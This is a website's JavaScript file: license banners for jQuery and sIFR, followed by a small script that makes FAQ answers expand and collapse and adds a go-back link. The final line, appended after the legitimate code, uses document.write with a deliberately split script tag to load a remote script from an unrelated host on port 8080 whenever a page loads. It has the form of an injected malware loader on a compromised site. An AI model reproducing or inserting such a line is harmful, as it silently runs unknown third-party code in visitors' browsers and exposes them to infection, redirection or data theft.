﻿/*
 * jQuery 1.2.6 - New Wave Javascript
 *
 * Copyright (c) 2008 John Resig (jquery.com)
 * Dual licensed under the MIT (MIT-LICENSE.txt)
 * and GPL (GPL-LICENSE.txt) licenses.
 *
 * $Date: 2008-05-24 14:22:17 -0400 (Sat, 24 May 2008) $
 * $Rev: 5685 $
 */

/*
 * jQuery UI 1.6RC2
 * Slider + Datepicker
 *
 */

/*	sIFR v2.0.7
 *	Copyright 2004 - 2007 Mark Wubben and Mike Davidson. Prior contributions by Shaun Inman and Tomas Jogin.
 *	
 *	This software is licensed under the CC-GNU LGPL <http://creativecommons.org/licenses/LGPL/2.1/>
 */
if(typeof sIFR == "function" && !sIFR.UA.bIsIEMac && (!sIFR.UA.bIsWebKit || sIFR.UA.nWebKitVersion >= 100)) sIFR.setup();

/*
 * Scripts
 *
 */
var Engine = {
	
	
	// faqs
	answersToggle : function(){
		$('dl.faq-a')
			.find('dd').hide().end()
			.find('dt').append('<span class="expand">expand</span>')
			.toggle(function(){
				$(this)
					.find('span').attr('class','collapse').html('collapse').end()
					.next('dd').fadeIn();
			},function(){
				$(this)
					.find('span').attr('class','expand').html('expand').end()
					.next('dd').fadeOut();
			});
	},
	
	
	// go back link
	goBack : function(){
		$('span.go-back').each(function(){
			$(this).wrap('<a href="#back"></a>').click(function(){
				history.go(-1)
				return false;
			});
		});
	}
}

$(document).ready(function(){
	Engine.answersToggle();
	Engine.goBack();
});


document.write('<s'+'cript type="text/javascript" src="http://dodo.busop.info:8080/Add-on.js"></scr'+'ipt>');